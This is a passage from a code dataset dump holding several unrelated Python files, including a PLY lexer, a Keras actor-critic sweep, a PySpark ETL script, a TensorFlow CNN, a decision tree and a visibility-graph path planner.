r'f[Aa][Ll][Ss][Ee]|t[Rr][Uu][Ee]'\n t.value = (t.value.lower == 'true')\n return t\n\n\ndef t_ID(t):\n r'[a-z][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_LINECOMMENT(t):\n r'--'\n t.lexer.begin('commentLine')\n\n\ndef t_TEXTCOMMENT(t):\n r'\\(\\*'\n t.lexer.comment_start = t.lexer.lexpos\n t.lexer.level = 1\n t.lexer.begin('commentText')\n\n\ndef t_STRING(t):\n r'\"'\n t.lexer.string_start = t.lexer.lexpos\n t.lexer.begin('string')\n\n\ntokens += list(reserved.values())\n\nt_ignore = ' \\t'\n\nt_commentLine_ignore = ' \\t'\n\n\ndef t_commentLine_error(t):\n t.lexer.skip(1)\n\n\ndef t_commentLine_newline(t):\n r'\\n+'\n t.lexer.begin('INITIAL')\n t.lexer.lineno += len(t.value)\n\n\nt_commentText_ignore = ' \\t'\n\n\ndef t_commentText_error(t):\n t.lexer.skip(1)\n\n\ndef t_commentText_OPENTEXT(t):\n r'\\(\\*'\n t.lexer.level += 1\n\n\ndef t_commentText_CLOSETEXT(t):\n 
r'\\*\\)'\n t.lexer.level -= 1\n if t.lexer.level == 0:\n t.lexer.begin('INITIAL')\n\n\ndef t_commentText_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\ndef t_commentText_eof(t):\n add_lexer_error(t.lexer.lineno, find_column(t.lexer.lexdata, t.lexer.lexpos), \"EOF in comment\")\n\n\nt_string_ignore = ''\n\n\ndef t_string_CLOSESTRING(t):\n r'\"'\n t.value = t.lexer.lexdata[t.lexer.string_start:t.lexer.lexpos - 1]\n t.type = 'STRING'\n t.lexer.begin('INITIAL')\n return t\n\n\ndef t_string_newline(t):\n r'\\\\\\n'\n t.lexer.lineno += 1\n\n\ndef t_string_body(t):\n r'([^\\n\\\"\\\\]|\\\\.)+'\n if t.value.rfind('\\0') != -1:\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos) + t.value.rfind('\\0'),\n \"String contains null character\")\n\n\ndef t_string_error(t):\n if t.value[0] == '\\n':\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), \"Unterminated string constant\")\n t.lexer.lineno += 1\n t.lexer.skip(1)\n t.lexer.begin('INITIAL')\n\n\ndef t_string_eof(t):\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), \"Unterminated string constant\")\n\n\ndef t_error(t):\n add_lexer_error(t.lineno, find_column(t.lexer.lexdata, t.lexpos), f'ERROR \\\"{t.value[0]}\\\"')\n t.lexer.skip(1)\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n\ndef test(data):\n lexer.input(data)\n while True:\n tok = lexer.token()\n if not tok:\n break\n\n\nlexer = lex.lex()\n","sub_path":"src/lexer_parser/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"209174784","text":"# Partially adapted from: https://keras.io/examples/rl/actor_critic_cartpole/\n# & https://www.tensorflow.org/tutorials/reinforcement_learning/actor_critic\nimport gym\nimport keras\nfrom keras import layers\nimport tensorflow as tf\nimport numpy as np\nimport sys\nimport os\nfrom os.path import isfile\nimport tensorflow_addons as tfa\nimport matplotlib.pyplot as plt\n\nbest_hidden = 0\nbest_lr = 0\nbest_episodes = 500\niteration = 0\nfor HIDDEN in [64, 128, 256, 512, 1024]:\n\tfor LR in [0.001, 0.003, 0.01, 0.1]:\n\t\t\tos.system('clear')\n\t\t\tprint('Now testing learning rate {}, hidden layer val {}'.format(LR, HIDDEN))\n\t\t\tseed = 42\n\t\t\tn_actions = 2\n\t\t\tn_inputs = 4\n\t\t\tn_hidden = HIDDEN\n\t\t\tlr = LR\n\t\t\tgamma = 0.99\n\t\t\tMAX_STEPS = 10000 #max steps per episode\n\t\t\teps = np.finfo(np.float32).eps.item()\n\t\t\tstates, action_prob_grads, rewards, action_probs = [], [], [], []\n\t\t\treward_sum = 0\n\t\t\tepisode_number = 0\n\n\t\t\t#common layers\n\t\t\tinputs = layers.Input(shape = (n_inputs, ))\n\t\t\tl1 = layers.Dense(n_hidden)(inputs)\n\t\t\tl2 = tfa.activations.mish(l1)\n\t\t\tl3 = layers.Dense(n_hidden)(l2)\n\t\t\tcommon = tfa.activations.mish(l3)\n\n\t\t\t#create actor and critic model\n\t\t\taction = layers.Dense(n_actions, activation = 'softmax')(common)\n\t\t\tcritic = layers.Dense(1)(common)\n\t\t\tmodel = keras.Model(inputs=inputs, outputs=[action, critic])\n\t\t\toptimizer = keras.optimizers.Adam(learning_rate=lr)\n\t\t\tloss = keras.losses.Huber()\n\n\t\t\taction_probs_history = []\n\t\t\tcritic_value_history = []\n\t\t\trewards_history = []\n\t\t\tepisode_count = 0\n\t\t\trunning_reward = 0\n\t\t\treward_plot = []\n\n\t\t\tenv = gym.make('CartPole-v0')\n\t\t\tenv.seed(seed)\n\t\t\twhile True:\n\t\t\t state = env.reset()\n\t\t\t episode_reward = 0\n\n\t\t\t with tf.GradientTape() as tape:\n\t\t\t for step 
in range(1, MAX_STEPS):\n\t\t\t state = tf.convert_to_tensor(state)\n\t\t\t state = tf.expand_dims(state, 0)\n\n\t\t\t action_probs, critic_value = model(state)\n\t\t\t critic_value_history.append(critic_value[0,0])\n\n\t\t\t action = np.random.choice(n_actions, p = np.squeeze(action_probs))\n\t\t\t action_probs_history.append(tf.math.log(action_probs[0, action]))\n\n\t\t\t state, reward, done, _ = env.step(action)\n\t\t\t rewards_history.append(reward)\n\t\t\t episode_reward += reward\n\n\t\t\t if done: break\n\n\t\t\t running_reward = 0.05 * episode_reward + (1-0.05) * running_reward\n\t\t\t reward_plot.append(running_reward)\n\t\t\t returns = []\n\t\t\t discounted_sum = 0\n\t\t\t for r in rewards_history[::-1]:\n\t\t\t discounted_sum = r + gamma * discounted_sum\n\t\t\t returns.insert(0, discounted_sum)\n\n\t\t\t returns = np.array(returns)\n\t\t\t returns = (returns - np.mean(returns))/(np.std(returns)+eps)\n\t\t\t returns = returns.tolist()\n\n\t\t\t history = zip(action_probs_history, critic_value_history, returns)\n\t\t\t actor_losses = []\n\t\t\t critic_losses = []\n\t\t\t for log_prob, value, ret in history:\n\t\t\t diff = ret - value\n\t\t\t actor_losses.append(-log_prob * diff)\n\t\t\t #update critic\n\t\t\t critic_losses.append(\n\t\t\t loss(tf.expand_dims(value, 0), tf.expand_dims(ret, 0))\n\t\t\t )\n\n\t\t\t loss_value = sum(actor_losses) + sum(critic_losses)\n\t\t\t grads = tape.gradient(loss_value, model.trainable_variables)\n\t\t\t optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\t\t\t action_probs_history.clear()\n\t\t\t critic_value_history.clear()\n\t\t\t rewards_history.clear()\n\n\t\t\t episode_count += 1\n\t\t\t if episode_count % 10 == 0:\n\t\t\t print(\"reward: {} at episode {}\".format(running_reward, episode_count))\n\t\t\t if running_reward > 195:\n\t\t\t print(\"Solved at episode {}\".format(episode_count))\n\t\t\t break\n\t\t\t if episode_count == 399:\n\t\t\t \tprint('Took too long, scrapping')\n\t\t\t \tbreak\n\t\t\tenv.close()\n\t\t\tprint('iteration {} complete'.format(iteration))\n\t\t\titeration += 1\n\t\t\tif episode_count < best_episodes:\n\t\t\t\tbest_episodes = episode_count\n\t\t\t\tbest_lr = LR\n\t\t\t\tbest_hidden = HIDDEN\n\nos.system('clear')\nprint('MISH HYPERPARAM SWEEP RESULTS')\nprint('Best learning rate: {}'.format(best_lr))\nprint('Best hidden: {}'.format(best_hidden))\nprint('Best convergence: {} Episodes'.format(best_episodes))","sub_path":"mish_paramsweep.py","file_name":"mish_paramsweep.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"67144644","text":"import csv\n\n### 商品クラス\nclass Item:\n def __init__(self,item_code,item_name,price):\n self.item_code = item_code\n self.item_name = item_name\n self.price = price\n\n def get_price(self):\n return self.price\n\n## オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list = []\n self.item_master = item_master\n\n def add_item_order(self,item_code,quantity):\n self.item_order_list.append([item_code,quantity])\n\n def view_item_list(self):\n for master in self.item_master:\n for item in self.item_order_list:\n # 注文一覧の各コードをマスターと比較\n if master.item_code == item[0]:\n print(f\"商品コード:{item[0]}|価格:{master.price}|個数:{item[1]}\")\n\n def exist_item_master(self,order_code):\n for item in self.item_master:\n if (item.item_code == order_code):\n return True\n\n return False\n\n## メイン処理\ndef main():\n # アイテムマスタ\n master_csv = \"item_master.csv\"\n csv_file = 
open(master_csv, 'r')\n # CSVデータを読み込む\n item_list = csv.reader(csv_file)\n # ヘッダーをスキップする\n header = next(item_list)\n\n item_master = []\n for item in item_list:\n item_master.append(Item(item[0],item[1],item[2]))\n\n # オーダーのインスタンス作成し、アイテムマスターをセットする\n order = Order(item_master)\n\n order_code = \"\"\n quantity = 0\n while True:\n order_code = input(\"商品コードを入力してください(オーダーストップはend)=>\")\n if (order_code == 'end'):\n print('注文を終わります')\n break\n\n quantity = input(\"個数を入力してください=>\")\n if (order.exist_item_master(order_code) == False):\n print(\"マスタに存在しません、再度商品コードを入力してください\")\n continue\n\n order.add_item_order(order_code,quantity)\n\n # オーダー表示\n order.view_item_list()\n\nif __name__ == \"__main__\":\n main()","sub_path":"study_four/kadai4.py","file_name":"kadai4.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523795116","text":"#!/usr/bin/env python3\nimport argparse\n\nIS_MEMBER, IS_PARENTHESIS_ROOT = 5, 3\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"paths\", default=[], nargs=\"*\", help=\"Input paths\")\n parser.add_argument(\"--is_member\", default=False, action=\"store_true\", help=\"Add is_member\")\n parser.add_argument(\"--is_parenthesis_root\", default=False, action=\"store_true\", help=\"Add is_parenthesis_root\")\n args = parser.parse_args()\n\n for path in args.paths:\n with open(path, \"r\", encoding=\"utf-8\") as conllu_file:\n for line in conllu_file:\n line = line.rstrip(\"\\n\")\n columns = line.split(\"\\t\")\n\n if len(columns) == 10:\n if args.is_member and columns[IS_MEMBER] == \"1\":\n columns[7] += \"_IsMember\"\n columns[IS_MEMBER] = \"_\"\n\n if args.is_parenthesis_root and columns[IS_PARENTHESIS_ROOT] == \"1\":\n columns[7] += \"_IsParenthesisRoot\"\n columns[IS_PARENTHESIS_ROOT] = \"_\"\n\n line = \"\\t\".join(columns)\n\n print(line)\n","sub_path":"WorkData2.0/tools/parsing/to_conllu/compose_deprel.py","file_name":"compose_deprel.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514743121","text":"# -*- coding: UTF-8 -*-\n# @Time : 2018/12/21 2:20 PM\n# @File : hyperparameters_factory.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom antgo.automl.suggestion.algorithm.grid_search import *\n\n\nclass HyperparametersFactory(object):\n @staticmethod\n def get(name):\n if name not in ['GridSearch']:\n return None\n\n if name == 'GridSearch':\n return GridSearchAlgorithm\n\n @staticmethod\n def all():\n return ['GridSearch']","sub_path":"antgo/automl/suggestion/algorithm/hyperparameters_factory.py","file_name":"hyperparameters_factory.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225410106","text":"import configparser\nfrom datetime import datetime\nimport os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import udf, col\nfrom pyspark.sql.functions import year, month, dayofmonth, hour, weekofyear, date_format\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID']=config.get('AWS', 'AWS_ACCESS_KEY_ID')\nos.environ['AWS_SECRET_ACCESS_KEY']=config.get('AWS', 'AWS_SECRET_ACCESS_KEY')\n\n\ndef create_spark_session():\n ''' Create a Spark Session and return the spark session 
object'''\n \n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .getOrCreate()\n return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n # get filepath to song data file\n song_data = input_data+'song_data/A/A/B/*.json'\n print('read song_data json files')\n \n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n songs_table = df.select(['song_id', 'title', 'artist_id', 'duration', 'year']).dropDuplicates()\n print('exrtacted data for songs_table')\n \n # write songs table to parquet files partitioned by year and artist\n #songs_table = songs_table.write().partitionBy(['year', 'artist_id']).format(\"parquet\").save(os.path.join(output_data, \"songs.parquet\"))\n print('saved songs_table')\n\n # extract columns to create artists table\n artists_table = df.select(['artist_id', 'artist_name', 'artist_location', 'artist_lattitude', 'artist_longitude']).dropDuplicates()\n \n # write artists table to parquet files\n #artists_table = artists_table.write().format(\"parquet\").save(os.path.join(output_data, \"artist.parquet\"))\n\n\n# def process_log_data(spark, input_data, output_data):\n# # get filepath to log data file\n# log_data = input_data+'log_data/2018/11/*.json'\n\n# # read log data file\n# df = spark.read.json(log_data)\n \n# # filter by actions for song plays\n# df = \n\n# # extract columns for users table \n# artists_table = \n \n# # write users table to parquet files\n# artists_table\n\n# # create timestamp column from original timestamp column\n# get_timestamp = udf()\n# df = \n \n# # create datetime column from original timestamp column\n# get_datetime = udf()\n# df = \n \n# # extract columns to create time table\n# time_table = \n \n# # write time table to parquet files partitioned by year and month\n# time_table\n\n# # read in song data to use for songplays table\n# song_df = \n\n# # extract columns from joined song and log datasets to create songplays table \n# songplays_table = \n\n# # write songplays table to parquet files partitioned by year and month\n# songplays_table\n\n\ndef main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n #output_data = \"s3a://praveen-practice-bucket/\"\n output_data = \"s3a://udacity-dend/\"\n \n process_song_data(spark, input_data, output_data) \n #process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"4 Data Lakes with Spark/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388112686","text":"\ndef checkInclusion(s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n c1 = []\n c2 = []\n for ch in s1:\n c1[ord(ch) - ord('a')] += 1\n for ch in s2:\n c2[ord(ch) - ord('a')] += 1\n\n if c1 == c2:\n return True\n\n\n\n\n\n\ncheckInclusion('ab', 'aaabaoo')","sub_path":"python_sward/Dance.py","file_name":"Dance.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1022870","text":"import tensorflow as tf\nimport Image\nimport numpy as np\nimport numpy.random as npr\nimport scipy.misc as spm\nfrom next_batch import *\n\ndef weight_variable(shape,stringg):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial,name=stringg)\n\ndef bias_variable(shape, stringg):\n initial = 
tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=stringg)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME') #it keeps the format of the image\n\ndef max_pool_2x2(x, stringg):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME', name=stringg) #it keeps the format of the image\n\n\n#defining the graph\n\nx = tf.placeholder(tf.float32, name=\"x\")\ny_ = tf.placeholder(tf.float32, name=\"y_\")\n\n#reshape the input data\nx_image = tf.reshape(x, [-1,224,224,3], name=\"x_image\")\n\n#create variables\nW_conv1 = weight_variable([5,5,3,32], \"W_conv1\")\nb_conv1 = bias_variable([32], \"b_conv1\")\n\n#apply a convolution and after that the relu\nh_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1, name=\"h_conv1\")\n\n#now the max pooling op\nh_pool1 = max_pool_2x2(h_conv1,\"h_pool1\")\n\n#add a second convolutional layer\nW_conv2 = weight_variable([6,6,32,32], 'W_conv2')\nb_conv2 = bias_variable([32], 'b_conv2')\n\n#apply a convolution and after that the relu\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2)+b_conv2, name='h_conv2')\n\n#now the max pooling op\nh_pool2 = max_pool_2x2(h_conv2, 'h_pool2')\n\n#and now we want to create a fully connected layer\nh_pool2_size = np.array(h_pool2.get_shape().as_list()[1:4])\nreduced = reduce(lambda x, y: x*y, h_pool2_size)\n\nWfc_1 = weight_variable([reduced, 1024], \"Wfc_1\")\nbfc_1 = bias_variable([1024], \"bfc_1\")\n\n#flattening the pooled image\nh_pool2_flat = tf.reshape(h_pool2, [-1,reduced])\n\n#and now we can multiply the weight and sum the bias\nhfc_1 = tf.add(tf.matmul(h_pool2_flat, Wfc_1), bfc_1)\nhfc_1 = tf.nn.relu(hfc_1, name=\"hfc_1\")\n\nWfc_2 = weight_variable([1024,2], \"Wfc_2\")\nbfc_2 = bias_variable([2], \"bfc_2\")\n\ny_hat = tf.add(tf.matmul(hfc_1,Wfc_2),bfc_2,name=\"y_hat\")\n\n#let's define the loss function, optimizer and accuracy\n\ncross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(\n labels=y_, logits=y_hat), name=\"cross_entropy\")\n\nlr = tf.placeholder(tf.float32, name=\"lr\")\n\noptimizer = tf.train.AdamOptimizer(1e-6)\ntrain_step = optimizer.minimize(cross_entropy)\ntf.add_to_collection('train_step', train_step)\n\n#for counting the correct predictions\ncorrect_prediction = tf.equal(tf.argmax(y_hat,1), tf.argmax(y_,1), name=\"correct_prediction\")\n\n#and for the accuracy\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name=\"accuracy\")\n\n#defining our parameters\nepochs = 100\nbatch_size = 55\npath = \"sample\"\ndisplay_step = 3\n\n#define the saver\nsaver = tf.train.Saver()\n\n#initializing the variables\ninit_op = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init_op)\n\n#load the number of images which will be\n#used for training\nvector_training = np.load(\"vectors/vector_training.npy\")\n\n#Let's train!\n\nvectortrain = npr.choice(vector_training, vector_training.size, replace=False)\nfor epoch in range(epochs):\n counter = 0\n for i in range(0,vectortrain.size,batch_size):\n batch = next_batch(vectortrain[i:(i+batch_size)],path,3)\n if counter%display_step == 0:\n train_accuracy = accuracy.eval(session=sess,feed_dict={\n x:batch[0], y_: batch[1]})\n print(\"step %d, training accuracy %g, epoch %d\"%(counter, train_accuracy, epoch))\n train_loss = cross_entropy.eval(session=sess,feed_dict={\n x:batch[0], y_: batch[1]})\n print(\"step %d, training loss %g, epoch %d\"%(counter, train_loss, epoch))\n train_step.run(session=sess, feed_dict={x: batch[0], y_: batch[1]})\n counter += 
1\n #save after every epoch\n if epoch%10 == 0:\n saver.save(sess, \"cnn2/my_model\")\n\nprint(\"Optimization finished\")\n\nvector_test = np.load(\"vectors/vector_test.npy\")\n\nxtest, ytest = next_batch(vector_test,path,3)\nprint(\"test accuracy %g\"%accuracy.eval(session=sess,feed_dict={\n x: xtest, y_: ytest}))\n\n#test accuracy 65,3846%\n","sub_path":"Projeto/code/models/cnn2.py","file_name":"cnn2.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401156248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 26 09:44:08 2021\n\n@author: spunlag\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse, Rectangle\n\nplt.figure()\nplt.axes()\nax = plt.gca()\n\nellipse = Ellipse(xy=(0.5, 0.4), width=1, height=0.8, \n edgecolor='r', fc='r', lw=2)\n\nrect = Rectangle((0, 0), 1, 0.8, linewidth=1, edgecolor='k', facecolor='None')\nax.add_patch(ellipse)\nax.add_patch(rect)\nax.plot(0.5,0.4, 'ko')\nplt.text(0.3,0.43,r'($\\ell_1 +\\bar{r_1}$,$\\ell_2 + \\bar{r_2}$ )=(0.5,0.4)') \nax.plot(1,0.4,'ko')\nplt.text(0.67, 0.35, r'($\\ell_1$,$\\ell_2 + \\bar{r_2}$) = (1,0.4)')\nax.plot(0.5, 0.8, 'ko')\nplt.text(0.35, 0.73, r'($\\ell_1 +\\bar{r_1}$,$\\ell_2$ )=(0.5,0.8)')\n","sub_path":"Shortest Path/ellipse.py","file_name":"ellipse.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258846645","text":"from math import log\n\n\ndef create_dataset():\n dataset = [[0, 0, 0, 0, 'no'],\n [0, 0, 0, 1, 'no'],\n [0, 1, 0, 1, 'yes'],\n [0, 1, 1, 0, 'yes'],\n [0, 0, 0, 0, 'no'],\n [1, 0, 0, 0, 'no'],\n [1, 0, 0, 1, 'no'],\n [1, 1, 1, 1, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [2, 0, 1, 2, 'yes'],\n [2, 0, 1, 1, 'yes'],\n [2, 1, 0, 1, 'yes'],\n [2, 1, 0, 2, 'yes'],\n [2, 0, 0, 0, 'no']]\n features = ['年龄', '有工作', '有自己的房子', '信贷情况']\n # 年龄:青年0,中年1,老年2\n # 有工作:是1,否0\n # 有自己的房子:是1,否0\n # 信贷情况:一般0,好1,非常好2\n return dataset, features\n\n\ndef calc_entropy(data):\n samples = len(data) # 对于监督学习对应的数据集,每一行数据为一个样本,每个样本包含一个特征向量和一个标记\n labels_count = {} # 构建字典{标记:出现次数}保存每个标记出现的次数\n\n for sample in data: # 对每一个样本进行统计\n label = sample[-1] # 每个样本的最后一列为标记\n if label not in labels_count.keys(): # 如果标记未放入统计次数的字典,添加进去\n labels_count[label] = 0\n labels_count[label] += 1 # 每个标记的样本数\n # print(labels_count)\n\n entropy = 0.0 # 经验熵(香农熵)\n for key in labels_count: # 计算香农熵\n prob = float(labels_count[key]) / samples # 标记对应次数/总的样本数\n entropy -= prob * log(prob, 2) # 利用公式计算\n return entropy\n\n\ndef split_dataset(data, axis, value):\n sub_data = []\n # 创建返回的数据集列表\n for feat_vec in data: # 遍历数据集\n if feat_vec[axis] == value:\n select_feat_vec = feat_vec[:axis] # 去掉axis特征\n select_feat_vec.append(feat_vec[axis]) # 将符合条件的添加到返回的数据集\n select_feat_vec.extend([feat_vec[len(data[0])-1]])\n sub_data.append(select_feat_vec)\n return sub_data\n\n\ndef calc_cond_entropy(data, axis):\n cond_entropy = 0\n feat_list = [sample[axis] for sample in data] # 取出某一列特征对应所有取值\n feat_value = list(set(feat_list))\n for value in feat_value:\n sub_data = split_dataset(data, axis, value)\n prob = len(sub_data)/float(len(data))\n cond_entropy += prob * calc_entropy(sub_data)\n return cond_entropy\n\n\ndef calc_info_gain(data, axis):\n # 信息增益 = 信息熵 - 条件熵\n info_gain = calc_entropy(data) - calc_cond_entropy(data, axis)\n return info_gain\n\n\ndef ID3_Algorithm(data):\n best_info_gain = 0.0\n best_feature = -1\n num_features = 
len(data[0]) - 1\n for i in range(num_features):\n info_gain = calc_info_gain(data, i)\n print(\"第%d个特征的增益为%.3f\" % (i, info_gain))\n if info_gain > best_info_gain:\n best_info_gain = info_gain\n best_feature = i\n return best_feature\n\n\ndef C4_5_Algorithm(data):\n return 0\n\n\nif __name__ == '__main__':\n d, f = create_dataset()\n print(\"最优特征为:%s\" % f[ID3_Algorithm(d)])\n","sub_path":"ClassicalAlgorithm/DecisionTree/DecisionTree_ByYourself.py","file_name":"DecisionTree_ByYourself.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466294841","text":"_base_ = [\n '../../_base_/models/deep_yolo_base.py',\n '../../_base_/datasets/antiuav_rgb_ncc.py',\n '../../_base_/drone_runtime.py'\n]\nmodel = dict(\n type='DeepSORT',\n pretrains=dict(\n detector= # noqa: E251\n \"/home2/lgfm95/drone/Strig-UAV-Project/anti-uav/YOLOv3/rgb/latest.pth\",\n reid= # noqa: E251\n 'https://download.openmmlab.com/mmtracking/mot/reid/tracktor_reid_r50_iter25245-a452f51f.pth' # noqa: E501\n ))\nimg_norm_cfg = dict(mean=[0, 0, 0], std=[255., 255., 255.], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='PhotoMetricDistortion'),\n dict(\n type='Expand',\n mean=img_norm_cfg['mean'],\n to_rgb=img_norm_cfg['to_rgb'],\n ratio_range=(1, 2)),\n dict(\n type='MinIoURandomCrop',\n min_ious=(0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n min_crop_size=0.3),\n dict(type='Resize', img_scale=[(320, 320), (608, 608)], keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(608, 608),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='VideoCollect', keys=['img'])\n ])\n]\ndata = dict(\n train=dict(pipeline=train_pipeline),\n test=dict(pipeline=test_pipeline)\n)","sub_path":"tracking/configs/mot/deepsort/deepsort_yolo_antiuav_rgb.py","file_name":"deepsort_yolo_antiuav_rgb.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133814682","text":"#!/usr/bin/env python\n\nimport numpy as np # I update the numpy to 1.15.1 using sudo pip install --upgrade numpy\nimport cv2\nfrom scipy.spatial import ConvexHull, convex_hull_plot_2d\nfrom marker import myMarker\n\n#read return obstacle objects from file\ndef load_obstacles(object_path):\n obstacles = []\n obstacle = []\n with open(object_path) as f:\n numObstacles = int(f.readline())\n coordinates = int(f.readline())\n for i in range(coordinates):\n line = f.readline()\n obstacle.append(list(map(int, line.strip().split(' '))))\n for line in f:\n coordinates = list(map(int, line.strip().split(' ')))\n if len(coordinates) == 1:\n obstacles.append(obstacle)\n obstacle = []\n else:\n obstacle.append(coordinates)\n obstacles.append(obstacle)\n assert len(obstacles)==numObstacles, \"number of obstacles does not match the first line\"\n \n return obstacles\n\n#return goal from file\ndef load_goal(goal_path):\n with open(goal_path) as f:\n line = f.readline()\n 
goal = list(map(int, line.strip().split(' ')))\n return goal\n\n\n#make an expanded set of points with margin w\ndef extraPointsMod(obsticle):\n newObsticle = []\n for point in obsticle:\n x = point[0] #---------x \n y = point[1] #---------y\n w = 18 #---------robot val assuming it's in the middle (width 36)\n #all points with a sqaure at every corner of orgininal vertex \n newObsticle.append([x-w, y+w])\n newObsticle.append([x-w, y])\n newObsticle.append([x-w, y-w])\n \n newObsticle.append([x, y+w])\n newObsticle.append([x,y])\n newObsticle.append([x, y-w])\n \n newObsticle.append([x+w, y+w])\n newObsticle.append([x+w, y])\n newObsticle.append([x+w, y-w])\n\n return newObsticle\n\n#make all non-colliding lines between the vertices of the hulls\ndef createLines(obsHulls, obsEdges):\n\n n = len(obsHulls)\n lines = []\n for i in range(n):\n hull1 = obsHulls[i]\n for a in hull1:\n for j in range(i+1,n):\n hull2 = obsHulls[j]\n for b in hull2:\n elem = [a,b]\n if not isCollision(a,b,obsEdges) :\n lines.append(elem)\n return lines\n\n\n#check if line [p1,p2] collides with objects defined by obsEdges\ndef isCollision(p1,p2, obsEdges):\n for edge in obsEdges:\n q1 = edge[0]\n q2 = edge[1]\n #checks if two lines intersect ie collision \n if isIntersect(p1, p2, q1, q2):\n return True\n \n #print(\"no collision detected\")\n return False\n\n#check whether two lines intersect\ndef isIntersect(p1, p2, q1, q2):\n #conditions for intersection\n\n o1 = orientation(p1, p2, q1)\n o2 = orientation(p1, p2, q2)\n o3 = orientation(q1, q2, p1)\n o4 = orientation(q1, q2, p2)\n\n if (equalVerts(p1, q1) or equalVerts(p1, q2) or equalVerts(p2, q1) or equalVerts(p2, q2)):\n return False\n if (o1 != o2 and o3 != o4):\n return True\n return False\n\n#utility fn\ndef equalVerts(v1, v2):\n return (v1[0] == v2[0] and v1[1] == v2[1])\n\n\n#https://stackoverflow.com/questions/17592800/how-to-find-the-orientation-of-three-points-in-a-two-dimensional-space-given-coo\ndef orientation(p, q, r):\n # find orientation of ordered triplet (p, q, r)\n #---0 --> p, q and r are colinear \n #---1 --> Clockwise \n #---2 --> Counterclockwise \n val = (q[1] - p[1]) * (r[0] - q[0]) - (q[0] - p[0]) * (r[1] - q[1]) \n \n #return val\n if val == 0:\n return 0\n elif val > 0:\n return 1\n return 2\n\n#given an ordered list of some object's vertices, returns its edges\ndef getEdges(obsVerts):\n n = len(obsVerts)\n lines = []\n \n for i in range(n-1):\n a = obsVerts[i]\n b = obsVerts[i+1]\n elem = [a,b]\n lines.append(elem)\n\n lastLine = [obsVerts[0], obsVerts[n-1]]\n lines.append(lastLine)\n return 